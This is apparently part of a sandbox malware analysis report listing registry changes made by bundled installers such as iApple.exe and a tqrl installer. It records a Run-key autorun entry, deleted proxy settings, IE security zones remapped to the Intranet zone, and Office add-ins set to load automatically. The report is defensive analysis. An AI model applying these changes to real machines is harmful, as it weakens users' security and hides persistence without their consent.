[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process mankind.exe:2904 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 9F 2A 77 F8 90 76 AF F7 56 90 07 A5 B7 F6 D7"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%System%\config\systemprofile\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%System%\config\systemprofile\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"

The process AppleDTAssistant.exe:1856 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppleDesktop]
"UOD" = "1008"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\AppleDesktop]
"POD" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppleDesktop]
"qd" = "28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C F1 56 0A FA 36 81 2B 2B 48 0C E0 E4 C5 87 E1"

[HKCU\Software\AppleDesktop]
"InstVersion" = "2.0.1.1001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2112 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\WpsAssist.Control.1\CLSID]
"(Default)" = "{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}"

[HKCU\Software\Classes\WpsAssist.Addins]
"(Default)" = "WpsAssist Class"

[HKCU\Software\Classes\WpsAssist.Addins.1\CLSID]
"(Default)" = "{C800994F-EC9B-46F9-9B01-31CE04E90063}"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\WpsAssist.Addins.1]
"(Default)" = "WpsAssist Class"

[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"

[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"

[HKCU\Software\Classes\WpsAssist.Control.1]
"(Default)" = "WpsAssistControl Class"

[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\ProgID]
"(Default)" = "WpsAssist.Addins.1"

[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\VersionIndependentProgID]
"(Default)" = "WpsAssist.Control"

[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\WpsAssist.Control]
"(Default)" = "WpsAssistControl Class"

[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Classes\WpsAssist.Control\CLSID]
"(Default)" = "{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"

[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Version]
"(Default)" = "1.0"

[HKCU\Software\Classes\WpsAssist.Control\CurVer]
"(Default)" = "WpsAssist.Control.1"

[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\WpsAssist.Addins\CurVer]
"(Default)" = "WpsAssist.Addins.1"

[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "WpsAssist 1.0 ÀàÐÍ¿â"

[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}]
"(Default)" = "WpsAssist Class"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"

[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist"

[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 97 9C 28 1F 3A 86 00 08 F9 F3 B5 F9 BF C2 D2"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\ProgID]
"(Default)" = "WpsAssist.Control.1"

[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\WpsAssist.Addins\CLSID]
"(Default)" = "{C800994F-EC9B-46F9-9B01-31CE04E90063}"

[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\VersionIndependentProgID]
"(Default)" = "WpsAssist.Addins"

[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"

[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}]
"(Default)" = "WpsAssistControl Class"

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
"ThreadingModel" = "Apartment"

The Dropped deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\Programmable]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\TypeLib]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Version]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\ProgID]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\TypeLib]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\ProgID]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Programmable]

The process regsvr32.exe:500 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 73 7C 27 97 C1 0E BE AB 38 1F 25 08 AB 86 AD"

The process regsvr32.exe:2324 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 64 24 7F 45 C2 5E 45 46 EE FE 99 85 D3 55 2E"

The process kindness.exe:2856 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 4D C8 8E DB A8 52 5C CC 16 4D C9 6C 80 3C 14"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The process Application Dataypfbyfgmr.exe:2796 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 9E D6 00 9B D6 DA E7 06 D8 CE CF CE 68 F0 54"

The process iApple.exe:1748 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 81 F7 6F F4 8E 02 68 A1 40 75 03 53 48 48 F4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001]
"AppleDesktop.exe" = "苹果桌面"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process apples_5_1008.exe:816 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Æ»¹û×ÀÃæ]
"InstallDate" = "2014-9-18"

[HKCU\Software\AppleDesktop]
"DisableAutorun" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Æ»¹û×ÀÃæ]
"DisplayName" = "Æ»¹û×ÀÃæ"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Æ»¹û×ÀÃæ]
"DisplayVersion" = "2.0.1.1001"
"Publisher" = "³É¶¼Áª»ªÐÅͨ¿Æ¼¼ÓÐÏÞ¹«Ë¾"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iApple.exe]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iApple.exe]
"Path" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Æ»¹û×ÀÃæ]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 FB 30 D5 CA C6 3D 19 E1 9B DC F4 37 BC E1 EB"

[HKCU\Software\AppleDesktop]
"InstVersion" = "2.0.1.1001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Æ»¹û×ÀÃæ]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\uninst.exe /from=reg"
"InstallLocation" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Æ»¹û×ÀÃæ" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe /from=autorun"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tqrl_89_177560.exe:1644 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\inskk]
"Install" = "1"

[HKLM\SOFTWARE\tianqic]
"ED" = "89"
"EN" = "tqrl_89_177560.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\tianqic]
"et" = "2014-9-18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\tianqic]
"EX" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

